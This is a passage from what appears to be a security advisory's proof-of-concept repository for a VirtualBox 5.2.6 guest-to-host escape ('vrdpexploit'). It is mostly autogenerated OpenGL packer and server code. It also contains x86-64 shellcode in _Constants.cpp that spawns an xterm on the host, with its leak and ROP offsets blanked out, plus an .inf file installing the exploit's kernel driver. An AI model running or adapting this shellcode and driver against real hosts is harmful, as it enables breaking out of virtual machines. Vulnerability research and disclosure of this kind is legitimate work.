48 | crMemcpy( data_ptr, payload, len ); 49 | 50 | WRITE_OPCODE( pc, CR_BOUNDSINFOCR_OPCODE ); 51 | pc->buffer.data_current += 24 + len_aligned; 52 | CR_UNLOCK_PACKER_CONTEXT(pc); 53 | } 54 | -------------------------------------------------------------------------------- /SSD Advisory - 3736/exploit/poc_vrdpexploit/vrdpexploit/VBoxOGLgen/pack_clipplane_swap.c: -------------------------------------------------------------------------------- 1 | /* THIS FILE IS AUTOGENERATED FROM E:/home/src/VirtualBox/src/VBox/GuestHost/OpenGL/packer/pack_clipplane.c BY pack_swap.py */ 2 | 3 | 4 | /* Copyright (c) 2001, Stanford University 5 | * All rights reserved 6 | * 7 | * See the file LICENSE.txt for information on redistributing this software. 8 | */ 9 | 10 | #include "packer.h" 11 | #include "cr_opcodes.h" 12 | 13 | void PACK_APIENTRY crPackClipPlaneSWAP( GLenum plane, const GLdouble *equation ) 14 | { 15 | CR_GET_PACKER_CONTEXT(pc); 16 | unsigned char *data_ptr; 17 | int packet_length = sizeof( plane ) + 4*sizeof(*equation); 18 | CR_GET_BUFFERED_POINTER(pc, packet_length ); 19 | WRITE_DATA(0, GLenum, SWAP32(plane)); 20 | WRITE_SWAPPED_DOUBLE( 4, equation[0] ); 21 | WRITE_SWAPPED_DOUBLE( 12, equation[1] ); 22 | WRITE_SWAPPED_DOUBLE( 20, equation[2] ); 23 | WRITE_SWAPPED_DOUBLE( 28, equation[3] ); 24 | WRITE_OPCODE( pc, CR_CLIPPLANE_OPCODE ); 25 | CR_UNLOCK_PACKER_CONTEXT(pc); 26 | } 27 | -------------------------------------------------------------------------------- /SSD Advisory - 3736/exploit/poc_vrdpexploit/vrdpexploit/VBoxOGLgen/pack_fog_swap.c: -------------------------------------------------------------------------------- 1 | /* THIS FILE IS AUTOGENERATED FROM E:/home/src/VirtualBox/src/VBox/GuestHost/OpenGL/packer/pack_fog.c BY pack_swap.py */ 2 | 3 | 4 | /* Copyright (c) 2001, Stanford University 5 | * All rights reserved 6 | * 7 | * See the file LICENSE.txt for information on redistributing this software. 8 | */ 9 | 10 | #include "packer.h" 11 | #include "cr_opcodes.h" 12 | 13 | static GLboolean __handleFogData( GLenum pname, const GLfloat *params ) 14 | { 15 | CR_GET_PACKER_CONTEXT(pc); 16 | int params_length = 0; 17 | int packet_length = sizeof( int ) + sizeof( pname ); 18 | unsigned char *data_ptr; 19 | switch( pname ) 20 | { 21 | case GL_FOG_MODE: 22 | case GL_FOG_DENSITY: 23 | case GL_FOG_START: 24 | case GL_FOG_END: 25 | case GL_FOG_INDEX: 26 | params_length = sizeof( *params ); 27 | break; 28 | case GL_FOG_COLOR: 29 | params_length = 4*sizeof( *params ); 30 | break; 31 | default: 32 | params_length = __packFogParamsLength( pname ); 33 | if (!params_length) 34 | { 35 | char msg[100]; 36 | sprintf(msg, "Invalid pname in Fog: %d", (int) pname ); 37 | __PackError( __LINE__, __FILE__, GL_INVALID_ENUM, msg); 38 | return GL_FALSE; 39 | } 40 | break; 41 | } 42 | packet_length += params_length; 43 | 44 | CR_GET_BUFFERED_POINTER(pc, packet_length ); 45 | WRITE_DATA(0, int, SWAP32(packet_length)); 46 | WRITE_DATA(4, GLenum, SWAP32(pname)); 47 | WRITE_DATA(8, GLuint, SWAPFLOAT(params[0])); 48 | if (packet_length > 12) 49 | { 50 | WRITE_DATA(12, GLuint, SWAPFLOAT(params[1])); 51 | WRITE_DATA(16, GLuint, SWAPFLOAT(params[2])); 52 | WRITE_DATA(20, GLuint, SWAPFLOAT(params[3])); 53 | } 54 | return GL_TRUE; 55 | } 56 | 57 | void PACK_APIENTRY crPackFogfvSWAP(GLenum pname, const GLfloat *params) 58 | { 59 | CR_GET_PACKER_CONTEXT(pc); 60 | if (__handleFogData( pname, params )) 61 | WRITE_OPCODE( pc, CR_FOGFV_OPCODE ); 62 | CR_UNLOCK_PACKER_CONTEXT(pc); 63 | } 64 | 65 | void PACK_APIENTRY crPackFogivSWAP(GLenum pname, const GLint *params) 66 | { 67 | CR_GET_PACKER_CONTEXT(pc); 68 | /* floats and ints are the same size, so the packing should be the same */ 69 | if (__handleFogData( pname, (const GLfloat *) params )) 70 | WRITE_OPCODE( pc, CR_FOGIV_OPCODE ); 71 | CR_UNLOCK_PACKER_CONTEXT(pc); 72 | } 73 | -------------------------------------------------------------------------------- /SSD Advisory - 3736/exploit/poc_vrdpexploit/vrdpexploit/VBoxOGLgen/pack_materials_swap.c: -------------------------------------------------------------------------------- 1 | /* THIS FILE IS AUTOGENERATED FROM E:/home/src/VirtualBox/src/VBox/GuestHost/OpenGL/packer/pack_materials.c BY pack_swap.py */ 2 | 3 | 4 | /* Copyright (c) 2001, Stanford University 5 | * All rights reserved 6 | * 7 | * See the file LICENSE.txt for information on redistributing this software. 8 | */ 9 | 10 | #include "packer.h" 11 | #include "cr_error.h" 12 | 13 | static void __handleMaterialData( GLenum face, GLenum pname, const GLfloat *params ) 14 | { 15 | CR_GET_PACKER_CONTEXT(pc); 16 | unsigned int packet_length = sizeof( int ) + sizeof( face ) + sizeof( pname ); 17 | unsigned int params_length = 0; 18 | unsigned char *data_ptr; 19 | switch( pname ) 20 | { 21 | case GL_AMBIENT: 22 | case GL_DIFFUSE: 23 | case GL_SPECULAR: 24 | case GL_EMISSION: 25 | case GL_AMBIENT_AND_DIFFUSE: 26 | params_length = 4*sizeof( *params ); 27 | break; 28 | case GL_COLOR_INDEXES: 29 | params_length = 3*sizeof( *params ); 30 | break; 31 | case GL_SHININESS: 32 | params_length = sizeof( *params ); 33 | break; 34 | default: 35 | __PackError(__LINE__, __FILE__, GL_INVALID_ENUM, "glMaterial(pname)"); 36 | return; 37 | } 38 | packet_length += params_length; 39 | 40 | CR_GET_BUFFERED_POINTER(pc, packet_length ); 41 | WRITE_DATA(0, int, SWAP32(packet_length)); 42 | WRITE_DATA(sizeof( int ) + 0, GLenum, SWAP32(face)); 43 | WRITE_DATA(sizeof( int ) + 4, GLenum, SWAP32(pname)); 44 | WRITE_DATA(sizeof( int ) + 8, GLuint, SWAPFLOAT(params[0])); 45 | if (params_length > sizeof( *params )) 46 | { 47 | WRITE_DATA(sizeof( int ) + 12, GLuint, SWAPFLOAT(params[1])); 48 | WRITE_DATA(sizeof( int ) + 16, GLuint, SWAPFLOAT(params[2])); 49 | } 50 | if (packet_length > 3*sizeof( *params ) ) 51 | { 52 | WRITE_DATA(sizeof( int ) + 20, GLuint, SWAPFLOAT(params[3])); 53 | } 54 | } 55 | 56 | void PACK_APIENTRY crPackMaterialfvSWAP(GLenum face, GLenum pname, const GLfloat *params) 57 | { 58 | CR_GET_PACKER_CONTEXT(pc); 59 | __handleMaterialData( face, pname, params ); 60 | WRITE_OPCODE( pc, CR_MATERIALFV_OPCODE ); 61 | CR_UNLOCK_PACKER_CONTEXT(pc); 62 | } 63 | 64 | void PACK_APIENTRY crPackMaterialivSWAP(GLenum face, GLenum pname, const GLint *params) 65 | { 66 | /* floats and ints are the same size, so the packing should be the same */ 67 | CR_GET_PACKER_CONTEXT(pc); 68 | __handleMaterialData( face, pname, (const GLfloat *) params ); 69 | WRITE_OPCODE( pc, CR_MATERIALIV_OPCODE ); 70 | CR_UNLOCK_PACKER_CONTEXT(pc); 71 | } 72 | -------------------------------------------------------------------------------- /SSD Advisory - 3736/exploit/poc_vrdpexploit/vrdpexploit/VBoxOGLgen/pack_regcombiner_swap.c: -------------------------------------------------------------------------------- 1 | /* THIS FILE IS AUTOGENERATED FROM E:/home/src/VirtualBox/src/VBox/GuestHost/OpenGL/packer/pack_regcombiner.c BY pack_swap.py */ 2 | 3 | 4 | /* Copyright (c) 2001, Stanford University 5 | * All rights reserved 6 | * 7 | * See the file LICENSE.txt for information on redistributing this software. 8 | */ 9 | 10 | #include "packer.h" 11 | #include "cr_opcodes.h" 12 | 13 | static GLboolean __handleCombinerParameterData(GLenum pname, const GLfloat *params, GLenum extended_opcode) 14 | { 15 | CR_GET_PACKER_CONTEXT(pc); 16 | unsigned int params_length = 0; 17 | unsigned int packet_length = sizeof(int) + sizeof(extended_opcode) + sizeof(pname); 18 | unsigned char *data_ptr; 19 | 20 | switch(pname) 21 | { 22 | case GL_CONSTANT_COLOR0_NV: 23 | case GL_CONSTANT_COLOR1_NV: 24 | params_length = 4 * sizeof(*params); 25 | break; 26 | case GL_NUM_GENERAL_COMBINERS_NV: 27 | case GL_COLOR_SUM_CLAMP_NV: 28 | params_length = sizeof(*params); 29 | break; 30 | default: 31 | __PackError(__LINE__, __FILE__, GL_INVALID_ENUM, 32 | "crPackCombinerParameterSWAP(bad pname)"); 33 | CRASSERT(0); 34 | return GL_FALSE; 35 | } 36 | packet_length += params_length; 37 | CR_GET_BUFFERED_POINTER(pc, packet_length); 38 | WRITE_DATA(0, int, SWAP32(packet_length)); 39 | WRITE_DATA(sizeof(int) + 0, GLenum, SWAP32(extended_opcode)); 40 | WRITE_DATA(sizeof(int) + 4, GLenum, SWAP32(pname)); 41 | WRITE_DATA(sizeof(int) + 8, GLuint, SWAPFLOAT(params[0])); 42 | if (params_length > sizeof(*params)) 43 | { 44 | WRITE_DATA(sizeof(int) + 12, GLuint, SWAPFLOAT(params[1])); 45 | WRITE_DATA(sizeof(int) + 16, GLuint, SWAPFLOAT(params[2])); 46 | WRITE_DATA(sizeof(int) + 20, GLuint, SWAPFLOAT(params[3])); 47 | CRASSERT(packet_length == sizeof(int) + 20 + 4); 48 | } 49 | return GL_TRUE; 50 | } 51 | 52 | void PACK_APIENTRY crPackCombinerParameterfvNVSWAP(GLenum pname, const GLfloat *params) 53 | { 54 | CR_GET_PACKER_CONTEXT(pc); 55 | if (__handleCombinerParameterData(pname, params, CR_COMBINERPARAMETERFVNV_EXTEND_OPCODE)) 56 | WRITE_OPCODE(pc, CR_EXTEND_OPCODE); 57 | CR_UNLOCK_PACKER_CONTEXT(pc); 58 | } 59 | 60 | void PACK_APIENTRY crPackCombinerParameterivNVSWAP(GLenum pname, const GLint *params) 61 | { 62 | /* floats and ints are the same size, so the packing should be the same */ 63 | CR_GET_PACKER_CONTEXT(pc); 64 | if (__handleCombinerParameterData(pname, (const GLfloat *) params, CR_COMBINERPARAMETERIVNV_EXTEND_OPCODE)) 65 | WRITE_OPCODE(pc, CR_EXTEND_OPCODE); 66 | CR_UNLOCK_PACKER_CONTEXT(pc); 67 | } 68 | 69 | void PACK_APIENTRY crPackCombinerStageParameterfvNVSWAP(GLenum stage, GLenum pname, const GLfloat *params) 70 | { 71 | CR_GET_PACKER_CONTEXT(pc); 72 | unsigned char *data_ptr; 73 | 74 | CR_GET_BUFFERED_POINTER(pc, 32); 75 | WRITE_DATA(0, GLint, SWAP32(32)); 76 | WRITE_DATA(4, GLenum, SWAP32(CR_COMBINERSTAGEPARAMETERFVNV_EXTEND_OPCODE)); 77 | WRITE_DATA(8, GLenum, SWAP32(stage)); 78 | WRITE_DATA(12, GLenum, SWAP32(pname)); 79 | WRITE_DATA(16, GLuint, SWAPFLOAT(params[0])); 80 | WRITE_DATA(20, GLuint, SWAPFLOAT(params[1])); 81 | WRITE_DATA(24, GLuint, SWAPFLOAT(params[2])); 82 | WRITE_DATA(28, GLuint, SWAPFLOAT(params[3])); 83 | WRITE_OPCODE(pc, CR_EXTEND_OPCODE); 84 | CR_UNLOCK_PACKER_CONTEXT(pc); 85 | } 86 | -------------------------------------------------------------------------------- /SSD Advisory - 3736/exploit/poc_vrdpexploit/vrdpexploit/VBoxOGLgen/pack_stipple_swap.c: -------------------------------------------------------------------------------- 1 | /* THIS FILE IS AUTOGENERATED FROM E:/home/src/VirtualBox/src/VBox/GuestHost/OpenGL/packer/pack_stipple.c BY pack_swap.py */ 2 | 3 | 4 | /* Copyright (c) 2001, Stanford University 5 | * All rights reserved 6 | * 7 | * See the file LICENSE.txt for information on redistributing this software. 8 | */ 9 | 10 | #include "packer.h" 11 | #include "cr_opcodes.h" 12 | #include "cr_mem.h" 13 | #include "cr_glstate.h" 14 | 15 | void PACK_APIENTRY crPackPolygonStippleSWAP( const GLubyte *mask ) 16 | { 17 | CR_GET_PACKER_CONTEXT(pc); 18 | unsigned char *data_ptr; 19 | int nodata = crStateIsBufferBound(GL_PIXEL_UNPACK_BUFFER_ARB); 20 | int packet_length = sizeof(int); 21 | 22 | if (nodata) 23 | packet_length += sizeof(GLint); 24 | else 25 | packet_length += 32*32/8; 26 | 27 | CR_GET_BUFFERED_POINTER(pc, packet_length ); 28 | WRITE_DATA_AI(int, SWAP32(nodata)); 29 | if (nodata) 30 | { 31 | WRITE_DATA_AI(GLint, SWAP32((GLint)(uintptr_t)mask)); 32 | } 33 | else 34 | { 35 | crMemcpy( data_ptr, mask, 32*32/8 ); 36 | } 37 | WRITE_OPCODE( pc, CR_POLYGONSTIPPLE_OPCODE ); 38 | CR_UNLOCK_PACKER_CONTEXT(pc); 39 | } 40 | -------------------------------------------------------------------------------- /SSD Advisory - 3736/exploit/poc_vrdpexploit/vrdpexploit/VBoxOGLgen/packspu_flush.c: -------------------------------------------------------------------------------- 1 | /* Copyright (c) 2001, Stanford University 2 | All rights reserved. 3 | 4 | See the file LICENSE.txt for information on redistributing this software. */ 5 | 6 | 7 | /* DO NOT EDIT - this file generated by packspu_flush.py script */ 8 | 9 | /* These are otherwise ordinary functions which require that the buffer be 10 | * flushed immediately after packing the function. 11 | */ 12 | #include "cr_glstate.h" 13 | #include "cr_packfunctions.h" 14 | #include "packspu.h" 15 | #include "packspu_proto.h" 16 | 17 | void PACKSPU_APIENTRY packspu_BarrierCreateCR(GLuint name, GLuint count) 18 | { 19 | GET_THREAD(thread); 20 | if (pack_spu.swap) 21 | { 22 | crPackBarrierCreateCRSWAP(name, count); 23 | } 24 | else 25 | { 26 | crPackBarrierCreateCR(name, count); 27 | } 28 | packspuFlush( (void *) thread ); 29 | } 30 | 31 | void PACKSPU_APIENTRY packspu_BarrierExecCR(GLuint name) 32 | { 33 | GET_THREAD(thread); 34 | if (pack_spu.swap) 35 | { 36 | crPackBarrierExecCRSWAP(name); 37 | } 38 | else 39 | { 40 | crPackBarrierExecCR(name); 41 | } 42 | packspuFlush( (void *) thread ); 43 | } 44 | 45 | void PACKSPU_APIENTRY packspu_SemaphoreCreateCR(GLuint name, GLuint count) 46 | { 47 | GET_THREAD(thread); 48 | if (pack_spu.swap) 49 | { 50 | crPackSemaphoreCreateCRSWAP(name, count); 51 | } 52 | else 53 | { 54 | crPackSemaphoreCreateCR(name, count); 55 | } 56 | packspuFlush( (void *) thread ); 57 | } 58 | 59 | void PACKSPU_APIENTRY packspu_SemaphorePCR(GLuint name) 60 | { 61 | GET_THREAD(thread); 62 | if (pack_spu.swap) 63 | { 64 | crPackSemaphorePCRSWAP(name); 65 | } 66 | else 67 | { 68 | crPackSemaphorePCR(name); 69 | } 70 | packspuFlush( (void *) thread ); 71 | } 72 | 73 | void PACKSPU_APIENTRY packspu_SemaphoreVCR(GLuint name) 74 | { 75 | GET_THREAD(thread); 76 | if (pack_spu.swap) 77 | { 78 | crPackSemaphoreVCRSWAP(name); 79 | } 80 | else 81 | { 82 | crPackSemaphoreVCR(name); 83 | } 84 | packspuFlush( (void *) thread ); 85 | } 86 | 87 | -------------------------------------------------------------------------------- /SSD Advisory - 3736/exploit/poc_vrdpexploit/vrdpexploit/VBoxOGLgen/server_retval.c: -------------------------------------------------------------------------------- 1 | /* Copyright (c) 2001, Stanford University 2 | All rights reserved. 3 | 4 | See the file LICENSE.txt for information on redistributing this software. */ 5 | 6 | 7 | /* DO NOT EDIT - THIS FILE AUTOMATICALLY GENERATED BY server_retval.py SCRIPT */ 8 | #include "chromium.h" 9 | #include "cr_mem.h" 10 | #include "cr_net.h" 11 | #include "server_dispatch.h" 12 | #include "server.h" 13 | 14 | void crServerReturnValue( const void *payload, unsigned int payload_len ) 15 | { 16 | if (!cr_server.fProcessingPendedCommands) 17 | { 18 | CRMessageReadback *rb; 19 | int msg_len = sizeof( *rb ) + payload_len; 20 | 21 | /* Don't reply to client if we're loading VM snapshot*/ 22 | if (cr_server.bIsInLoadingState) 23 | return; 24 | 25 | if (cr_server.curClient->conn->type == CR_FILE) 26 | { 27 | return; 28 | } 29 | 30 | rb = (CRMessageReadback *) crAlloc( msg_len ); 31 | 32 | rb->header.type = CR_MESSAGE_READBACK; 33 | CRDBGPTR_PRINTRB(cr_server.curClient->conn->u32ClientID, &cr_server.writeback_ptr); 34 | CRDBGPTR_CHECKNZ(&cr_server.writeback_ptr); 35 | CRDBGPTR_CHECKNZ(&cr_server.return_ptr); 36 | crMemcpy( &(rb->writeback_ptr), &(cr_server.writeback_ptr), sizeof( rb->writeback_ptr ) ); 37 | crMemcpy( &(rb->readback_ptr), &(cr_server.return_ptr), sizeof( rb->readback_ptr ) ); 38 | crMemcpy( rb+1, payload, payload_len ); 39 | crNetSend( cr_server.curClient->conn, NULL, rb, msg_len ); 40 | CRDBGPTR_SETZ(&cr_server.writeback_ptr); 41 | CRDBGPTR_SETZ(&cr_server.return_ptr); 42 | crFree( rb ); 43 | return; 44 | } 45 | #ifdef DEBUG_misha 46 | WARN(("Pending command returns value")); 47 | #endif 48 | CRDBGPTR_SETZ(&cr_server.writeback_ptr); 49 | CRDBGPTR_SETZ(&cr_server.return_ptr); 50 | } 51 | 52 | GLenum SERVER_DISPATCH_APIENTRY crServerDispatchCheckFramebufferStatusEXT(GLenum target) 53 | { 54 | GLenum retval; 55 | retval = cr_server.head_spu->dispatch_table.CheckFramebufferStatusEXT(target); 56 | crServerReturnValue( &retval, sizeof(retval) ); 57 | return retval; /* WILL PROBABLY BE IGNORED */ 58 | } 59 | GLboolean SERVER_DISPATCH_APIENTRY crServerDispatchIsEnabled(GLenum cap) 60 | { 61 | GLboolean retval; 62 | retval = cr_server.head_spu->dispatch_table.IsEnabled(cap); 63 | crServerReturnValue( &retval, sizeof(retval) ); 64 | return retval; /* WILL PROBABLY BE IGNORED */ 65 | } 66 | GLboolean SERVER_DISPATCH_APIENTRY crServerDispatchIsFenceNV(GLuint fence) 67 | { 68 | GLboolean retval; 69 | retval = cr_server.head_spu->dispatch_table.IsFenceNV(fence); 70 | crServerReturnValue( &retval, sizeof(retval) ); 71 | return retval; /* WILL PROBABLY BE IGNORED */ 72 | } 73 | GLboolean SERVER_DISPATCH_APIENTRY crServerDispatchIsQueryARB(GLuint id) 74 | { 75 | GLboolean retval; 76 | retval = cr_server.head_spu->dispatch_table.IsQueryARB(id); 77 | crServerReturnValue( &retval, sizeof(retval) ); 78 | return retval; /* WILL PROBABLY BE IGNORED */ 79 | } 80 | GLint SERVER_DISPATCH_APIENTRY crServerDispatchRenderMode(GLenum mode) 81 | { 82 | GLint retval; 83 | retval = cr_server.head_spu->dispatch_table.RenderMode(mode); 84 | crServerReturnValue( &retval, sizeof(retval) ); 85 | return retval; /* WILL PROBABLY BE IGNORED */ 86 | } 87 | GLboolean SERVER_DISPATCH_APIENTRY crServerDispatchTestFenceNV(GLuint fence) 88 | { 89 | GLboolean retval; 90 | retval = cr_server.head_spu->dispatch_table.TestFenceNV(fence); 91 | crServerReturnValue( &retval, sizeof(retval) ); 92 | return retval; /* WILL PROBABLY BE IGNORED */ 93 | } 94 | -------------------------------------------------------------------------------- /SSD Advisory - 3736/exploit/poc_vrdpexploit/vrdpexploit/VBoxOGLgen/state_line_gen.c: -------------------------------------------------------------------------------- 1 | /* This code is AUTOGENERATED!!! */ 2 | 3 | #include "state.h" 4 | #include "state_internals.h" 5 | 6 | void crStateLineDiff(CRLineBits *b, CRbitvalue *bitID, 7 | CRContext *fromCtx, CRContext *toCtx) 8 | { 9 | CRLineState *from = &(fromCtx->line); 10 | CRLineState *to = &(toCtx->line); 11 | unsigned int j, i; 12 | CRbitvalue nbitID[CR_MAX_BITARRAY]; 13 | for (j = 0; jenable, bitID)) 17 | { 18 | glAble able[2]; 19 | able[0] = diff_api.Disable; 20 | able[1] = diff_api.Enable; 21 | if (from->lineSmooth != to->lineSmooth) 22 | { 23 | able[to->lineSmooth](GL_LINE_SMOOTH); 24 | from->lineSmooth = to->lineSmooth; 25 | } 26 | if (from->lineStipple != to->lineStipple) 27 | { 28 | able[to->lineStipple](GL_LINE_STIPPLE); 29 | from->lineStipple = to->lineStipple; 30 | } 31 | CLEARDIRTY(b->enable, nbitID); 32 | } 33 | if (CHECKDIRTY(b->width, bitID)) 34 | { 35 | if (from->width != to->width) 36 | { 37 | diff_api.LineWidth(to->width); 38 | from->width = to->width; 39 | } 40 | CLEARDIRTY(b->width, nbitID); 41 | } 42 | if (to->lineStipple) 43 | { 44 | if (CHECKDIRTY(b->stipple, bitID)) 45 | { 46 | if (from->repeat != to->repeat || 47 | from->pattern != to->pattern) 48 | { 49 | diff_api.LineStipple(to->repeat, 50 | to->pattern); 51 | from->repeat = to->repeat; 52 | from->pattern = to->pattern; 53 | } 54 | CLEARDIRTY(b->stipple, nbitID); 55 | } 56 | } /*lineStipple*/ 57 | CLEARDIRTY(b->dirty, nbitID); 58 | } 59 | 60 | void crStateLineSwitch(CRLineBits *b, CRbitvalue *bitID, 61 | CRContext *fromCtx, CRContext *toCtx) 62 | { 63 | CRLineState *from = &(fromCtx->line); 64 | CRLineState *to = &(toCtx->line); 65 | unsigned int j, i; 66 | CRbitvalue nbitID[CR_MAX_BITARRAY]; 67 | for (j = 0; jenable, bitID)) 71 | { 72 | glAble able[2]; 73 | able[0] = diff_api.Disable; 74 | able[1] = diff_api.Enable; 75 | if (from->lineSmooth != to->lineSmooth) 76 | { 77 | able[to->lineSmooth](GL_LINE_SMOOTH); 78 | FILLDIRTY(b->enable); 79 | FILLDIRTY(b->dirty); 80 | } 81 | if (from->lineStipple != to->lineStipple) 82 | { 83 | able[to->lineStipple](GL_LINE_STIPPLE); 84 | FILLDIRTY(b->enable); 85 | FILLDIRTY(b->dirty); 86 | } 87 | CLEARDIRTY(b->enable, nbitID); 88 | } 89 | if (CHECKDIRTY(b->width, bitID)) 90 | { 91 | if (from->width != to->width) 92 | { 93 | diff_api.LineWidth(to->width); 94 | FILLDIRTY(b->width); 95 | FILLDIRTY(b->dirty); 96 | } 97 | CLEARDIRTY(b->width, nbitID); 98 | } 99 | if (CHECKDIRTY(b->stipple, bitID)) 100 | { 101 | if (from->repeat != to->repeat || 102 | from->pattern != to->pattern) 103 | { 104 | diff_api.LineStipple(to->repeat, 105 | to->pattern); 106 | FILLDIRTY(b->stipple); 107 | FILLDIRTY(b->dirty); 108 | } 109 | CLEARDIRTY(b->stipple, nbitID); 110 | } 111 | CLEARDIRTY(b->dirty, nbitID); 112 | } 113 | 114 | -------------------------------------------------------------------------------- /SSD Advisory - 3736/exploit/poc_vrdpexploit/vrdpexploit/_Constants.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | /****************************************************************************** 4 | * Exploit's contants - if something not works, consider to review them 5 | ******************************************************************************/ 6 | 7 | /* Removed for the sake of PoC */ 8 | ULONGLONG OffsetFromOglToLeakedAddr = ???; // VBoxSharedCrOpenGL.so 9 | ULONGLONG OffsetFromVboxddToLeakedAddr = ???; // VBoxDD.so 10 | ULONGLONG OffsetFromOglToVramPtr = ???; // g_pvVRamBase 11 | ULONGLONG OffsetFromVboxddToRopGadget = ???; 12 | 13 | UCHAR gShellcode[] = 14 | "\x48\xC7\xC0\x3A\x00\x00\x00" // mov rax, 00000003A 15 | "\x0F\x05" // syscall 16 | "\x48\x85\xC0" // test rax, rax 17 | "\x75\x3A" // jnz 000000048 18 | "\x48\x8D\x35\x4E\x00\x00\x00" // lea rsi, [000000063] 19 | "\x48\x89\x35\x6B\x00\x00\x00" // mov [000000087], rsi 20 | "\x48\x8D\x35\x57\x00\x00\x00" // lea rsi, [00000007A] 21 | "\x48\x89\x35\x6D\x00\x00\x00" // mov [000000097], rsi 22 | "\x48\x8D\x3D\x32\x00\x00\x00" // lea rdi, [000000063] 23 | "\x48\x8D\x35\x4F\x00\x00\x00" // lea rsi, [000000087] 24 | "\x48\x8D\x15\x58\x00\x00\x00" // lea rdx, [000000097] 25 | "\x48\xC7\xC0\x3B\x00\x00\x00" // mov rax, 00000003B 26 | "\x0F\x05" // syscall 27 | "\x48\x8B\xBC\x24\xB8\x01\x00\x00" // mov rdi, [rsp][0000002D8] 28 | "\x48\x81\xC5\x80\x03\x00\x00" // add rbp, 0000002D0 29 | "\x48\x81\xC4\xC0\x01\x00\x00" // add rsp, 0000002E0 30 | "\x48\x31\xC0" // xor rax, rax 31 | "\x57" // push rdi 32 | "\xC3" // retn 33 | "\x2F\x75\x73\x72\x2F\x62\x69\x6E\x2F\x78\x74\x65\x72\x6D\x00\x00\x00\x00\x00\x00\x00\x00\x00" // "/usr/bin/xterm" 34 | "\x44\x49\x53\x50\x4C\x41\x59\x3D\x3A\x30\x2E\x30\x00" // "DISPLAY=:0.0" 35 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" // argv[] 36 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; // envp[] 37 | 38 | SIZE_T gShellcodeSize = sizeof(gShellcode); 39 | 40 | /****************************************************************************** 41 | * End of exploit's contants 42 | ******************************************************************************/ 43 | -------------------------------------------------------------------------------- /SSD Advisory - 3736/exploit/poc_vrdpexploit/vrdpexploit/product-generated.h: -------------------------------------------------------------------------------- 1 | #ifndef ___product_generated_h___ 2 | #define ___product_generated_h___ 3 | 4 | #define VBOX_VENDOR "Oracle Corporation" 5 | #define VBOX_VENDOR_SHORT "Oracle" 6 | #define VBOX_PRODUCT "Oracle VM VirtualBox" 7 | #define VBOX_BUILD_PUBLISHER "_OSE" 8 | #define VBOX_C_YEAR "2018" 9 | 10 | #endif 11 | -------------------------------------------------------------------------------- /SSD Advisory - 3736/exploit/poc_vrdpexploit/vrdpexploit/version-generated.h: -------------------------------------------------------------------------------- 1 | #ifndef ___version_generated_h___ 2 | #define ___version_generated_h___ 3 | 4 | #define VBOX_VERSION_MAJOR 5 5 | #define VBOX_VERSION_MINOR 2 6 | #define VBOX_VERSION_BUILD 6 7 | #define VBOX_VERSION_STRING_RAW "5.2.6" 8 | #define VBOX_VERSION_STRING "5.2.6_OSE" 9 | #define VBOX_API_VERSION_STRING "5_2" 10 | 11 | #define VBOX_PRIVATE_BUILD_DESC "Private build by admin" 12 | 13 | #endif 14 | -------------------------------------------------------------------------------- /SSD Advisory - 3736/exploit/poc_vrdpexploit/vrdpexploit/vrdpexploit.inf: -------------------------------------------------------------------------------- 1 | ; 2 | ; vrdpexploit.inf 3 | ; 4 | 5 | [Version] 6 | Signature="$WINDOWS NT$" 7 | Class=Sample ; TODO: edit Class 8 | ClassGuid={78A1C341-4539-11d3-B88D-00C04FAD5171} ; TODO: edit ClassGuid 9 | Provider=%ManufacturerName% 10 | CatalogFile=vrdpexploit.cat 11 | DriverVer= ; TODO: set DriverVer in stampinf property pages 12 | 13 | [DestinationDirs] 14 | DefaultDestDir = 12 15 | vrdpexploit_Device_CoInstaller_CopyFiles = 11 16 | 17 | ; ================= Class section ===================== 18 | 19 | [ClassInstall32] 20 | Addreg=SampleClassReg 21 | 22 | [SampleClassReg] 23 | HKR,,,0,%ClassName% 24 | HKR,,Icon,,-5 25 | 26 | [SourceDisksNames] 27 | 1 = %DiskName%,,,"" 28 | 29 | [SourceDisksFiles] 30 | vrdpexploit.sys = 1,, 31 | WdfCoInstaller$KMDFCOINSTALLERVERSION$.dll=1 ; make sure the number matches with SourceDisksNames 32 | 33 | ;***************************************** 34 | ; Install Section 35 | ;***************************************** 36 | 37 | [Manufacturer] 38 | %ManufacturerName%=Standard,NT$ARCH$ 39 | 40 | [Standard.NT$ARCH$] 41 | %vrdpexploit.DeviceDesc%=vrdpexploit_Device, Root\vrdpexploit ; TODO: edit hw-id 42 | 43 | [vrdpexploit_Device.NT] 44 | CopyFiles=Drivers_Dir 45 | 46 | [Drivers_Dir] 47 | vrdpexploit.sys 48 | 49 | ;-------------- Service installation 50 | [vrdpexploit_Device.NT.Services] 51 | AddService = vrdpexploit,%SPSVCINST_ASSOCSERVICE%, vrdpexploit_Service_Inst 52 | 53 | ; -------------- vrdpexploit driver install sections 54 | [vrdpexploit_Service_Inst] 55 | DisplayName = %vrdpexploit.SVCDESC% 56 | ServiceType = 1 ; SERVICE_KERNEL_DRIVER 57 | StartType = 3 ; SERVICE_DEMAND_START 58 | ErrorControl = 1 ; SERVICE_ERROR_NORMAL 59 | ServiceBinary = %12%\vrdpexploit.sys 60 | 61 | ; 62 | ;--- vrdpexploit_Device Coinstaller installation ------ 63 | ; 64 | 65 | [vrdpexploit_Device.NT.CoInstallers] 66 | AddReg=vrdpexploit_Device_CoInstaller_AddReg 67 | CopyFiles=vrdpexploit_Device_CoInstaller_CopyFiles 68 | 69 | [vrdpexploit_Device_CoInstaller_AddReg] 70 | HKR,,CoInstallers32,0x00010000, "WdfCoInstaller$KMDFCOINSTALLERVERSION$.dll,WdfCoInstaller" 71 | 72 | [vrdpexploit_Device_CoInstaller_CopyFiles] 73 | WdfCoInstaller$KMDFCOINSTALLERVERSION$.dll 74 | 75 | [vrdpexploit_Device.NT.Wdf] 76 | KmdfService = vrdpexploit, vrdpexploit_wdfsect 77 | [vrdpexploit_wdfsect] 78 | KmdfLibraryVersion = $KMDFVERSION$ 79 | 80 | [Strings] 81 | SPSVCINST_ASSOCSERVICE= 0x00000002 82 | ManufacturerName="" ;TODO: Replace with your manufacturer name 83 | ClassName="Samples" ; TODO: edit ClassName 84 | DiskName = "vrdpexploit Installation Disk" 85 | vrdpexploit.DeviceDesc = "vrdpexploit Device" 86 | vrdpexploit.SVCDESC = "vrdpexploit Service" 87 | -------------------------------------------------------------------------------- /SSD Advisory - 